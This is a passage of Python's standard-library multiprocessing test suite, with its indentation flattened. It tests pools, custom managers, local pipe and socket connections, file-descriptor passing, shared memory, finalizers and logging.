with self.Pool(1) as p:
with self.assertRaises(RuntimeError):
p.apply(self._test_wrapped_exception)
def test_map_no_failfast(self):
# Issue #23992: the fail-fast behaviour when an exception is raised
# during map() would make Pool.join() deadlock, because a worker
# process would fill the result queue (after the result handler thread
# terminated, hence not draining it anymore).
t_start = time.time()
with self.assertRaises(ValueError):
with self.Pool(2) as p:
try:
p.map(raise_large_valuerror, [0, 1])
finally:
time.sleep(0.5)
p.close()
p.join()
# check that we indeed waited for all jobs
self.assertGreater(time.time() - t_start, 0.9)
def test_release_task_refs(self):
# Issue #29861: task arguments and results should not be kept
# alive after we are done with them.
objs = [CountedObject() for i in range(10)]
refs = [weakref.ref(o) for o in objs]
self.pool.map(identity, objs)
del objs
time.sleep(DELTA) # let threaded cleanup code run
self.assertEqual(set(wr() for wr in refs), {None})
# With a process pool, copies of the objects are returned, check
# they were released too.
self.assertEqual(CountedObject.n_instances, 0)
def raising():
raise KeyError("key")
def unpickleable_result():
return lambda: 42
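# Note: unpickleable_result() deliberately returns a lambda. pickle
# serializes functions by qualified name, and a lambda created inside a
# function body has no importable name, so shipping the result back from
# a worker fails and surfaces as MaybeEncodingError below.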
class _TestPoolWorkerErrors(BaseTestCase):
ALLOWED_TYPES = ('processes', )
def test_async_error_callback(self):
p = multiprocessing.Pool(2)
scratchpad = [None]
def errback(exc):
scratchpad[0] = exc
res = p.apply_async(raising, error_callback=errback)
self.assertRaises(KeyError, res.get)
self.assertTrue(scratchpad[0])
self.assertIsInstance(scratchpad[0], KeyError)
p.close()
p.join()
def test_unpickleable_result(self):
from multiprocessing.pool import MaybeEncodingError
p = multiprocessing.Pool(2)
# Make sure we don't lose pool processes because of encoding errors.
for iteration in range(20):
scratchpad = [None]
def errback(exc):
scratchpad[0] = exc
res = p.apply_async(unpickleable_result, error_callback=errback)
self.assertRaises(MaybeEncodingError, res.get)
wrapped = scratchpad[0]
self.assertTrue(wrapped)
self.assertIsInstance(scratchpad[0], MaybeEncodingError)
self.assertIsNotNone(wrapped.exc)
self.assertIsNotNone(wrapped.value)
p.close()
p.join()
class _TestPoolWorkerLifetime(BaseTestCase):
ALLOWED_TYPES = ('processes', )
def test_pool_worker_lifetime(self):
p = multiprocessing.Pool(3, maxtasksperchild=10)
self.assertEqual(3, len(p._pool))
origworkerpids = [w.pid for w in p._pool]
# Run many tasks so each worker gets replaced (hopefully)
results = []
for i in range(100):
results.append(p.apply_async(sqr, (i, )))
# Fetch the results and verify we got the right answers,
# also ensuring all the tasks have completed.
for (j, res) in enumerate(results):
self.assertEqual(res.get(), sqr(j))
# Refill the pool
p._repopulate_pool()
# Wait until all workers are alive
# (countdown * DELTA = 5 seconds max startup process time)
countdown = 50
while countdown and not all(w.is_alive() for w in p._pool):
countdown -= 1
time.sleep(DELTA)
finalworkerpids = [w.pid for w in p._pool]
# All pids should be assigned. See issue #7805.
self.assertNotIn(None, origworkerpids)
self.assertNotIn(None, finalworkerpids)
# Finally, check that the worker pids have changed
self.assertNotEqual(sorted(origworkerpids), sorted(finalworkerpids))
p.close()
p.join()
def test_pool_worker_lifetime_early_close(self):
# Issue #10332: closing a pool whose workers have limited lifetimes
# before all the tasks completed would make join() hang.
p = multiprocessing.Pool(3, maxtasksperchild=1)
results = []
for i in range(6):
results.append(p.apply_async(sqr, (i, 0.3)))
p.close()
p.join()
# check the results
for (j, res) in enumerate(results):
self.assertEqual(res.get(), sqr(j))
#
# Test of creating a customized manager class
#
from multiprocessing.managers import BaseManager, BaseProxy, RemoteError
class FooBar(object):
def f(self):
return 'f()'
def g(self):
raise ValueError
def _h(self):
return '_h()'
def baz():
for i in range(10):
yield i*i
class IteratorProxy(BaseProxy):
_exposed_ = ('__next__',)
def __iter__(self):
return self
def __next__(self):
return self._callmethod('__next__')
class MyManager(BaseManager):
pass
MyManager.register('Foo', callable=FooBar)
MyManager.register('Bar', callable=FooBar, exposed=('f', '_h'))
MyManager.register('baz', callable=baz, proxytype=IteratorProxy)
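# Note: register() without `exposed` publishes the referent's public
# methods, so 'Foo' proxies get f() and g() but not _h(); the explicit
# exposed=('f', '_h') for 'Bar' whitelists those two names, and
# proxytype=IteratorProxy makes 'baz' proxies iterable by forwarding
# __next__ through _callmethod().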
class _TestMyManager(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def test_mymanager(self):
manager = MyManager()
manager.start()
self.common(manager)
manager.shutdown()
# If the manager process exited cleanly then the exitcode
# will be zero. Otherwise (after a short timeout)
# terminate() is used, resulting in an exitcode of -SIGTERM.
self.assertEqual(manager._process.exitcode, 0)
def test_mymanager_context(self):
with MyManager() as manager:
self.common(manager)
# bpo-30356: BaseManager._finalize_manager() sends SIGTERM
# to the manager process if it takes longer than 1 second to stop.
self.assertIn(manager._process.exitcode, (0, -signal.SIGTERM))
def test_mymanager_context_prestarted(self):
manager = MyManager()
manager.start()
with manager:
self.common(manager)
self.assertEqual(manager._process.exitcode, 0)
def common(self, manager):
foo = manager.Foo()
bar = manager.Bar()
baz = manager.baz()
foo_methods = [name for name in ('f', 'g', '_h') if hasattr(foo, name)]
bar_methods = [name for name in ('f', 'g', '_h') if hasattr(bar, name)]
self.assertEqual(foo_methods, ['f', 'g'])
self.assertEqual(bar_methods, ['f', '_h'])
self.assertEqual(foo.f(), 'f()')
self.assertRaises(ValueError, foo.g)
self.assertEqual(foo._callmethod('f'), 'f()')
self.assertRaises(RemoteError, foo._callmethod, '_h')
self.assertEqual(bar.f(), 'f()')
self.assertEqual(bar._h(), '_h()')
self.assertEqual(bar._callmethod('f'), 'f()')
self.assertEqual(bar._callmethod('_h'), '_h()')
self.assertEqual(list(baz), [i*i for i in range(10)])
#
# Test of connecting to a remote server and using xmlrpclib for serialization
#
_queue = pyqueue.Queue()
def get_queue():
return _queue
class QueueManager(BaseManager):
'''manager class used by server process'''
QueueManager.register('get_queue', callable=get_queue)
class QueueManager2(BaseManager):
'''manager class which specifies the same interface as QueueManager'''
QueueManager2.register('get_queue')
SERIALIZER = 'xmlrpclib'
class _TestRemoteManager(BaseTestCase):
ALLOWED_TYPES = ('manager',)
values = ['hello world', None, True, 2.25,
'hall\xe5 v\xe4rlden',
'\u043f\u0440\u0438\u0432\u0456\u0442 \u0441\u0432\u0456\u0442',
b'hall\xe5 v\xe4rlden',
]
result = values[:]
@classmethod
def _putter(cls, address, authkey):
manager = QueueManager2(
address=address, authkey=authkey, serializer=SERIALIZER
)
manager.connect()
queue = manager.get_queue()
# Note that xmlrpclib will deserialize the object as a list, not a tuple
queue.put(tuple(cls.values))
def test_remote(self):
authkey = os.urandom(32)
manager = QueueManager(
address=(test.support.HOST, 0), authkey=authkey, serializer=SERIALIZER
)
manager.start()
p = self.Process(target=self._putter, args=(manager.address, authkey))
p.daemon = True
p.start()
manager2 = QueueManager2(
address=manager.address, authkey=authkey, serializer=SERIALIZER
)
manager2.connect()
queue = manager2.get_queue()
self.assertEqual(queue.get(), self.result)
# Because we are using xmlrpclib for serialization instead of
# pickle this will cause a serialization error.
self.assertRaises(Exception, queue.put, time.sleep)
# Make queue finalizer run before the server is stopped
del queue
manager.shutdown()
class _TestManagerRestart(BaseTestCase):
@classmethod
def _putter(cls, address, authkey):
manager = QueueManager(
address=address, authkey=authkey, serializer=SERIALIZER)
manager.connect()
queue = manager.get_queue()
queue.put('hello world')
def test_rapid_restart(self):
authkey = os.urandom(32)
manager = QueueManager(
address=(test.support.HOST, 0), authkey=authkey, serializer=SERIALIZER)
srvr = manager.get_server()
addr = srvr.address
# Close the connection.Listener socket which gets opened as part
# of manager.get_server(). It's not needed for the test.
srvr.listener.close()
manager.start()
p = self.Process(target=self._putter, args=(manager.address, authkey))
p.start()
p.join()
queue = manager.get_queue()
self.assertEqual(queue.get(), 'hello world')
del queue
manager.shutdown()
manager = QueueManager(
address=addr, authkey=authkey, serializer=SERIALIZER)
try:
manager.start()
except OSError as e:
if e.errno != errno.EADDRINUSE:
raise
# Retry after some time, in case the old socket was lingering
# (sporadic failure on buildbots)
time.sleep(1.0)
manager = QueueManager(
address=addr, authkey=authkey, serializer=SERIALIZER)
manager.shutdown()
#
#
#
SENTINEL = latin('')
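# Note: SENTINEL is the empty byte string; _TestConnection._echo below
# echoes messages until it receives it, so sending SENTINEL is how a
# parent tells the echo child to fall out of its recv loop and exit.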
class _TestConnection(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
@classmethod
def _echo(cls, conn):
for msg in iter(conn.recv_bytes, SENTINEL):
conn.send_bytes(msg)
conn.close()
def test_connection(self):
conn, child_conn = self.Pipe()
p = self.Process(target=self._echo, args=(child_conn,))
p.daemon = True
p.start()
seq = [1, 2.25, None]
msg = latin('hello world')
longmsg = msg * 10
arr = array.array('i', list(range(4)))
if self.TYPE == 'processes':
self.assertEqual(type(conn.fileno()), int)
self.assertEqual(conn.send(seq), None)
self.assertEqual(conn.recv(), seq)
self.assertEqual(conn.send_bytes(msg), None)
self.assertEqual(conn.recv_bytes(), msg)
if self.TYPE == 'processes':
buffer = array.array('i', [0]*10)
expected = list(arr) + [0] * (10 - len(arr))
self.assertEqual(conn.send_bytes(arr), None)
self.assertEqual(conn.recv_bytes_into(buffer),
len(arr) * buffer.itemsize)
self.assertEqual(list(buffer), expected)
buffer = array.array('i', [0]*10)
expected = [0] * 3 + list(arr) + [0] * (10 - 3 - len(arr))
self.assertEqual(conn.send_bytes(arr), None)
self.assertEqual(conn.recv_bytes_into(buffer, 3 * buffer.itemsize),
len(arr) * buffer.itemsize)
self.assertEqual(list(buffer), expected)
buffer = bytearray(latin(' ' * 40))
self.assertEqual(conn.send_bytes(longmsg), None)
try:
res = conn.recv_bytes_into(buffer)
except multiprocessing.BufferTooShort as e:
self.assertEqual(e.args, (longmsg,))
else:
self.fail('expected BufferTooShort, got %s' % res)
poll = TimingWrapper(conn.poll)
self.assertEqual(poll(), False)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(poll(-1), False)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(poll(TIMEOUT1), False)
self.assertTimingAlmostEqual(poll.elapsed, TIMEOUT1)
conn.send(None)
time.sleep(.1)
self.assertEqual(poll(TIMEOUT1), True)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(conn.recv(), None)
really_big_msg = latin('X') * (1024 * 1024 * 16)  # 16 MiB
conn.send_bytes(really_big_msg)
self.assertEqual(conn.recv_bytes(), really_big_msg)
conn.send_bytes(SENTINEL) # tell child to quit
child_conn.close()
if self.TYPE == 'processes':
self.assertEqual(conn.readable, True)
self.assertEqual(conn.writable, True)
self.assertRaises(EOFError, conn.recv)
self.assertRaises(EOFError, conn.recv_bytes)
p.join()
def test_duplex_false(self):
reader, writer = self.Pipe(duplex=False)
self.assertEqual(writer.send(1), None)
self.assertEqual(reader.recv(), 1)
if self.TYPE == 'processes':
self.assertEqual(reader.readable, True)
self.assertEqual(reader.writable, False)
self.assertEqual(writer.readable, False)
self.assertEqual(writer.writable, True)
self.assertRaises(OSError, reader.send, 2)
self.assertRaises(OSError, writer.recv)
self.assertRaises(OSError, writer.poll)
def test_spawn_close(self):
# We test that a pipe connection can be closed by parent
# process immediately after child is spawned. On Windows this
# would have sometimes failed on old versions because
# child_conn would be closed before the child got a chance to
# duplicate it.
conn, child_conn = self.Pipe()
p = self.Process(target=self._echo, args=(child_conn,))
p.daemon = True
p.start()
child_conn.close() # this might complete before child initializes
msg = latin('hello')
conn.send_bytes(msg)
self.assertEqual(conn.recv_bytes(), msg)
conn.send_bytes(SENTINEL)
conn.close()
p.join()
def test_sendbytes(self):
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
msg = latin('abcdefghijklmnopqrstuvwxyz')
a, b = self.Pipe()
a.send_bytes(msg)
self.assertEqual(b.recv_bytes(), msg)
a.send_bytes(msg, 5)
self.assertEqual(b.recv_bytes(), msg[5:])
a.send_bytes(msg, 7, 8)
self.assertEqual(b.recv_bytes(), msg[7:7+8])
a.send_bytes(msg, 26)
self.assertEqual(b.recv_bytes(), latin(''))
a.send_bytes(msg, 26, 0)
self.assertEqual(b.recv_bytes(), latin(''))
self.assertRaises(ValueError, a.send_bytes, msg, 27)
self.assertRaises(ValueError, a.send_bytes, msg, 22, 5)
self.assertRaises(ValueError, a.send_bytes, msg, 26, 1)
self.assertRaises(ValueError, a.send_bytes, msg, -1)
self.assertRaises(ValueError, a.send_bytes, msg, 4, -1)
@classmethod
def _is_fd_assigned(cls, fd):
try:
os.fstat(fd)
except OSError as e:
if e.errno == errno.EBADF:
return False
raise
else:
return True
@classmethod
def _writefd(cls, conn, data, create_dummy_fds=False):
if create_dummy_fds:
for i in range(0, 256):
if not cls._is_fd_assigned(i):
os.dup2(conn.fileno(), i)
fd = reduction.recv_handle(conn)
if msvcrt:
fd = msvcrt.open_osfhandle(fd, os.O_WRONLY)
os.write(fd, data)
os.close(fd)
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
def test_fd_transfer(self):
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._writefd, args=(child_conn, b"foo"))
p.daemon = True
p.start()
self.addCleanup(test.support.unlink, test.support.TESTFN)
with open(test.support.TESTFN, "wb") as f:
fd = f.fileno()
if msvcrt:
fd = msvcrt.get_osfhandle(fd)
reduction.send_handle(conn, fd, p.pid)
p.join()
with open(test.support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"foo")
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
@unittest.skipIf(sys.platform == "win32",
"test semantics don't make sense on Windows")
@unittest.skipIf(MAXFD <= 256,
"largest assignable fd number is too small")
@unittest.skipUnless(hasattr(os, "dup2"),
"test needs os.dup2()")
def test_large_fd_transfer(self):
# With fd > 256 (issue #11657)
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._writefd, args=(child_conn, b"bar", True))
p.daemon = True
p.start()
self.addCleanup(test.support.unlink, test.support.TESTFN)
with open(test.support.TESTFN, "wb") as f:
fd = f.fileno()
for newfd in range(256, MAXFD):
if not self._is_fd_assigned(newfd):
break
else:
self.fail("could not find an unassigned large file descriptor")
os.dup2(fd, newfd)
try:
reduction.send_handle(conn, newfd, p.pid)
finally:
os.close(newfd)
p.join()
with open(test.support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"bar")
@classmethod
def _send_data_without_fd(cls, conn):
os.write(conn.fileno(), b"\0")
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
@unittest.skipIf(sys.platform == "win32", "doesn't make sense on Windows")
def test_missing_fd_transfer(self):
# Check that exception is raised when received data is not
# accompanied by a file descriptor in ancillary data.
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._send_data_without_fd, args=(child_conn,))
p.daemon = True
p.start()
self.assertRaises(RuntimeError, reduction.recv_handle, conn)
p.join()
def test_context(self):
a, b = self.Pipe()
with a, b:
a.send(1729)
self.assertEqual(b.recv(), 1729)
if self.TYPE == 'processes':
self.assertFalse(a.closed)
self.assertFalse(b.closed)
if self.TYPE == 'processes':
self.assertTrue(a.closed)
self.assertTrue(b.closed)
self.assertRaises(OSError, a.recv)
self.assertRaises(OSError, b.recv)
class _TestListener(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_multiple_bind(self):
for family in self.connection.families:
l = self.connection.Listener(family=family)
self.addCleanup(l.close)
self.assertRaises(OSError, self.connection.Listener,
l.address, family)
def test_context(self):
with self.connection.Listener() as l:
with self.connection.Client(l.address) as c:
with l.accept() as d:
c.send(1729)
self.assertEqual(d.recv(), 1729)
if self.TYPE == 'processes':
self.assertRaises(OSError, l.accept)
class _TestListenerClient(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
@classmethod
def _test(cls, address):
conn = cls.connection.Client(address)
conn.send('hello')
conn.close()
def test_listener_client(self):
for family in self.connection.families:
l = self.connection.Listener(family=family)
p = self.Process(target=self._test, args=(l.address,))
p.daemon = True
p.start()
conn = l.accept()
self.assertEqual(conn.recv(), 'hello')
p.join()
l.close()
def test_issue14725(self):
l = self.connection.Listener()
p = self.Process(target=self._test, args=(l.address,))
p.daemon = True
p.start()
time.sleep(1)
# On Windows the client process should by now have connected,
# written its data and closed the pipe handle. This causes
# ConnectNamedPipe() to fail with ERROR_NO_DATA. See Issue
# 14725.
conn = l.accept()
self.assertEqual(conn.recv(), 'hello')
conn.close()
p.join()
l.close()
def test_issue16955(self):
for fam in self.connection.families:
l = self.connection.Listener(family=fam)
c = self.connection.Client(l.address)
a = l.accept()
a.send_bytes(b"hello")
self.assertTrue(c.poll(1))
a.close()
c.close()
l.close()
class _TestPoll(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def test_empty_string(self):
a, b = self.Pipe()
self.assertEqual(a.poll(), False)
b.send_bytes(b'')
self.assertEqual(a.poll(), True)
self.assertEqual(a.poll(), True)
@classmethod
def _child_strings(cls, conn, strings):
for s in strings:
time.sleep(0.1)
conn.send_bytes(s)
conn.close()
def test_strings(self):
strings = (b'hello', b'', b'a', b'b', b'', b'bye', b'', b'lop')
a, b = self.Pipe()
p = self.Process(target=self._child_strings, args=(b, strings))
p.start()
for s in strings:
for i in range(200):
if a.poll(0.01):
break
x = a.recv_bytes()
self.assertEqual(s, x)
p.join()
@classmethod
def _child_boundaries(cls, r):
# Polling may "pull" a message into the child process, but we
# don't want it to pull only part of a message, as that would
# corrupt the pipe for any other processes which might later
# read from it.
r.poll(5)
def test_boundaries(self):
r, w = self.Pipe(False)
p = self.Process(target=self._child_boundaries, args=(r,))
p.start()
time.sleep(2)
L = [b"first", b"second"]
for obj in L:
w.send_bytes(obj)
w.close()
p.join()
self.assertIn(r.recv_bytes(), L)
@classmethod
def _child_dont_merge(cls, b):
b.send_bytes(b'a')
b.send_bytes(b'b')
b.send_bytes(b'cd')
def test_dont_merge(self):
a, b = self.Pipe()
self.assertEqual(a.poll(0.0), False)
self.assertEqual(a.poll(0.1), False)
p = self.Process(target=self._child_dont_merge, args=(b,))
p.start()
self.assertEqual(a.recv_bytes(), b'a')
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.recv_bytes(), b'b')
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(0.0), True)
self.assertEqual(a.recv_bytes(), b'cd')
p.join()
#
# Test of sending connection and socket objects between processes
#
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
class _TestPicklingConnections(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def tearDownClass(cls):
from multiprocessing import resource_sharer
resource_sharer.stop(timeout=TIMEOUT)
@classmethod
def _listener(cls, conn, families):
for fam in families:
l = cls.connection.Listener(family=fam)
conn.send(l.address)
new_conn = l.accept()
conn.send(new_conn)
new_conn.close()
l.close()
l = socket.socket()
l.bind((test.support.HOST, 0))
l.listen()
conn.send(l.getsockname())
new_conn, addr = l.accept()
conn.send(new_conn)
new_conn.close()
l.close()
conn.recv()
@classmethod
def _remote(cls, conn):
for (address, msg) in iter(conn.recv, None):
client = cls.connection.Client(address)
client.send(msg.upper())
client.close()
address, msg = conn.recv()
client = socket.socket()
client.connect(address)
client.sendall(msg.upper())
client.close()
conn.close()
def test_pickling(self):
families = self.connection.families
lconn, lconn0 = self.Pipe()
lp = self.Process(target=self._listener, args=(lconn0, families))
lp.daemon = True
lp.start()
lconn0.close()
rconn, rconn0 = self.Pipe()
rp = self.Process(target=self._remote, args=(rconn0,))
rp.daemon = True
rp.start()
rconn0.close()
for fam in families:
msg = ('This connection uses family %s' % fam).encode('ascii')
address = lconn.recv()
rconn.send((address, msg))
new_conn = lconn.recv()
self.assertEqual(new_conn.recv(), msg.upper())
rconn.send(None)
msg = latin('This connection uses a normal socket')
address = lconn.recv()
rconn.send((address, msg))
new_conn = lconn.recv()
buf = []
while True:
s = new_conn.recv(100)
if not s:
break
buf.append(s)
buf = b''.join(buf)
self.assertEqual(buf, msg.upper())
new_conn.close()
lconn.send(None)
rconn.close()
lconn.close()
lp.join()
rp.join()
@classmethod
def child_access(cls, conn):
w = conn.recv()
w.send('all is well')
w.close()
r = conn.recv()
msg = r.recv()
conn.send(msg*2)
conn.close()
def test_access(self):
# On Windows, if we do not specify a destination pid when
# using DupHandle then we need to be careful to use the
# correct access flags for DuplicateHandle(), or else
# DupHandle.detach() will raise PermissionError. For example,
# for a read only pipe handle we should use
# access=FILE_GENERIC_READ. (Unfortunately
# DUPLICATE_SAME_ACCESS does not work.)
conn, child_conn = self.Pipe()
p = self.Process(target=self.child_access, args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
r, w = self.Pipe(duplex=False)
conn.send(w)
w.close()
self.assertEqual(r.recv(), 'all is well')
r.close()
r, w = self.Pipe(duplex=False)
conn.send(r)
r.close()
w.send('foobar')
w.close()
self.assertEqual(conn.recv(), 'foobar'*2)
p.join()
#
#
#
class _TestHeap(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_heap(self):
iterations = 5000
maxblocks = 50
blocks = []
# create and destroy lots of blocks of different sizes
for i in range(iterations):
size = int(random.lognormvariate(0, 1) * 1000)
b = multiprocessing.heap.BufferWrapper(size)
blocks.append(b)
if len(blocks) > maxblocks:
i = random.randrange(maxblocks)
del blocks[i]
# get the heap object
heap = multiprocessing.heap.BufferWrapper._heap
# verify the state of the heap
all = []
occupied = 0
heap._lock.acquire()
self.addCleanup(heap._lock.release)
for L in list(heap._len_to_seq.values()):
for arena, start, stop in L:
all.append((heap._arenas.index(arena), start, stop,
stop-start, 'free'))
for arena, start, stop in heap._allocated_blocks:
all.append((heap._arenas.index(arena), start, stop,
stop-start, 'occupied'))
occupied += (stop-start)
all.sort()
for i in range(len(all)-1):
(arena, start, stop) = all[i][:3]
(narena, nstart, nstop) = all[i+1][:3]
self.assertTrue((arena != narena and nstart == 0) or
(stop == nstart))
def test_free_from_gc(self):
# Check that freeing of blocks by the garbage collector doesn't deadlock
# (issue #12352).
# Make sure the GC is enabled, and set lower collection thresholds to
# make collections more frequent (and increase the probability of
# deadlock).
if not gc.isenabled():
gc.enable()
self.addCleanup(gc.disable)
thresholds = gc.get_threshold()
self.addCleanup(gc.set_threshold, *thresholds)
gc.set_threshold(10)
# perform numerous block allocations, with cyclic references to make
# sure objects are collected asynchronously by the gc
for i in range(5000):
a = multiprocessing.heap.BufferWrapper(1)
b = multiprocessing.heap.BufferWrapper(1)
# circular references
a.buddy = b
b.buddy = a
#
#
#
class _Foo(Structure):
_fields_ = [
('x', c_int),
('y', c_double),
('z', c_longlong,)
]
class _TestSharedCTypes(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
if not HAS_SHAREDCTYPES:
self.skipTest("requires multiprocessing.sharedctypes")
@classmethod
def _double(cls, x, y, z, foo, arr, string):
x.value *= 2
y.value *= 2
z.value *= 2
foo.x *= 2
foo.y *= 2
string.value *= 2
for i in range(len(arr)):
arr[i] *= 2
def test_sharedctypes(self, lock=False):
x = Value('i', 7, lock=lock)
y = Value(c_double, 1.0/3.0, lock=lock)
z = Value(c_longlong, 2 ** 33, lock=lock)
foo = Value(_Foo, 3, 2, lock=lock)
arr = self.Array('d', list(range(10)), lock=lock)
string = self.Array('c', 20, lock=lock)
string.value = latin('hello')
p = self.Process(target=self._double, args=(x, y, z, foo, arr, string))
p.daemon = True
p.start()
p.join()
self.assertEqual(x.value, 14)
self.assertAlmostEqual(y.value, 2.0/3.0)
self.assertEqual(z.value, 2 ** 34)
self.assertEqual(foo.x, 6)
self.assertAlmostEqual(foo.y, 4.0)
for i in range(10):
self.assertAlmostEqual(arr[i], i*2)
self.assertEqual(string.value, latin('hellohello'))
def test_synchronize(self):
self.test_sharedctypes(lock=True)
def test_copy(self):
foo = _Foo(2, 5.0, 2 ** 33)
bar = copy(foo)
foo.x = 0
foo.y = 0
foo.z = 0
self.assertEqual(bar.x, 2)
self.assertAlmostEqual(bar.y, 5.0)
self.assertEqual(bar.z, 2 ** 33)
#
#
#
class _TestFinalize(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
self.registry_backup = util._finalizer_registry.copy()
util._finalizer_registry.clear()
def tearDown(self):
self.assertFalse(util._finalizer_registry)
util._finalizer_registry.update(self.registry_backup)
@classmethod
def _test_finalize(cls, conn):
class Foo(object):
pass
a = Foo()
util.Finalize(a, conn.send, args=('a',))
del a # triggers callback for a
b = Foo()
close_b = util.Finalize(b, conn.send, args=('b',))
close_b() # triggers callback for b
close_b() # does nothing because callback has already been called
del b # does nothing because callback has already been called
c = Foo()
util.Finalize(c, conn.send, args=('c',))
d10 = Foo()
util.Finalize(d10, conn.send, args=('d10',), exitpriority=1)
d01 = Foo()
util.Finalize(d01, conn.send, args=('d01',), exitpriority=0)
d02 = Foo()
util.Finalize(d02, conn.send, args=('d02',), exitpriority=0)
d03 = Foo()
util.Finalize(d03, conn.send, args=('d03',), exitpriority=0)
util.Finalize(None, conn.send, args=('e',), exitpriority=-10)
util.Finalize(None, conn.send, args=('STOP',), exitpriority=-100)
# call multiprocessing's cleanup function then exit process without
# garbage collecting locals
util._exit_function()
conn.close()
os._exit(0)
def test_finalize(self):
conn, child_conn = self.Pipe()
p = self.Process(target=self._test_finalize, args=(child_conn,))
p.daemon = True
p.start()
p.join()
result = [obj for obj in iter(conn.recv, 'STOP')]
self.assertEqual(result, ['a', 'b', 'd10', 'd03', 'd02', 'd01', 'e'])
def test_thread_safety(self):
# bpo-24484: _run_finalizers() should be thread-safe
def cb():
pass
class Foo(object):
def __init__(self):
self.ref = self # create reference cycle
# insert finalizer at random key
util.Finalize(self, cb, exitpriority=random.randint(1, 100))
finish = False
exc = None
def run_finalizers():
nonlocal exc
while not finish:
time.sleep(random.random() * 1e-1)
try:
# A GC run will eventually happen during this,
# collecting stale Foo's and mutating the registry
util._run_finalizers()
except Exception as e:
exc = e
def make_finalizers():
nonlocal exc
d = {}
while not finish:
try:
# Old Foo's get gradually replaced and later
# collected by the GC (because of the cyclic ref)
d[random.getrandbits(5)] = {Foo() for i in range(10)}
except Exception as e:
exc = e
d.clear()
old_interval = sys.getswitchinterval()
old_threshold = gc.get_threshold()
try:
sys.setswitchinterval(1e-6)
gc.set_threshold(5, 5, 5)
threads = [threading.Thread(target=run_finalizers),
threading.Thread(target=make_finalizers)]
with test.support.start_threads(threads):
time.sleep(4.0) # Wait a bit to trigger race condition
finish = True
if exc is not None:
raise exc
finally:
sys.setswitchinterval(old_interval)
gc.set_threshold(*old_threshold)
gc.collect() # Collect remaining Foo's
#
# Test that from ... import * works for each module
#
class _TestImportStar(unittest.TestCase):
def get_module_names(self):
import glob
folder = os.path.dirname(multiprocessing.__file__)
pattern = os.path.join(folder, '*.py')
files = glob.glob(pattern)
modules = [os.path.splitext(os.path.split(f)[1])[0] for f in files]
modules = ['multiprocessing.' + m for m in modules]
modules.remove('multiprocessing.__init__')
modules.append('multiprocessing')
return modules
def test_import(self):
modules = self.get_module_names()
if sys.platform == 'win32':
modules.remove('multiprocessing.popen_fork')
modules.remove('multiprocessing.popen_forkserver')
modules.remove('multiprocessing.popen_spawn_posix')
else:
modules.remove('multiprocessing.popen_spawn_win32')
if not HAS_REDUCTION:
modules.remove('multiprocessing.popen_forkserver')
if c_int is None:
# This module requires _ctypes
modules.remove('multiprocessing.sharedctypes')
for name in modules:
__import__(name)
mod = sys.modules[name]
self.assertTrue(hasattr(mod, '__all__'), name)
for attr in mod.__all__:
self.assertTrue(
hasattr(mod, attr),
'%r does not have attribute %r' % (mod, attr)
)
#
# Quick test that logging works -- does not test logging output
#
class _TestLogging(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_enable_logging(self):
logger = multiprocessing.get_logger()
logger.setLevel(util.SUBWARNING)
self.assertTrue(logger is not None)
logger.debug('this will not be printed')
logger.info('nor will this')
logger.setLevel(LOG_LEVEL)
@classmethod
def _test_level(cls, conn):
logger = multiprocessing.get_logger()
conn.send(logger.getEffectiveLevel())
def test_level(self):
LEVEL1 = 32
LEVEL2 = 37
logger = multiprocessing.get_logger()
root_logger = logging.getLogger()
root_level = root_logger.level
reader, writer = multiprocessing.Pipe(duplex=False)
logger.setLevel(LEVEL1)
p = self.Process(target=self._test_level, args=(writer,))
p.start()
self.assertEqual(LEVEL1, reader.recv())
p.join()
p.close()
logger.setLevel(logging.NOTSET)
root_logger.setLevel(LEVEL2)
p = self.Process(target=self._test_level, args=(writer,))
p.start()
self.assertEqual(LEVEL2, reader.recv())
p.join()
p.close()
root_logger.setLevel(root_level)
logger.setLevel(level=LOG_LEVEL)
# class _TestLoggingProcessName(BaseTestCase):
#
# def handle(self, record):
# assert record.processName == multiprocessing.current_process().name
# self.__handled = True
#
# def test_logging(self):
# handler = logging.Handler()
# handler.handle = self.handle
# self.__handled = False
# # Bypass getLogger() and side-effects
# logger = logging.getLoggerClass()(
# 'multiprocessing.test.TestLoggingProcessName')
# logger.addHandler(handler)
# logger.propagate = False
#
# logger.warn('foo')
# assert self.__handled
#
# Check that Process.join() retries if os.waitpid() fails with EINTR
#
class _TestPollEintr(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def _killer(cls, pid):
time.sleep(0.1)
os.kill(pid, signal.SIGUSR1)
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_poll_eintr(self):
got_signal = [False]
def record(*args):
got_signal[0] = True
pid = os.getpid()
oldhandler = signal.signal(signal.SIGUSR1, record)
try:
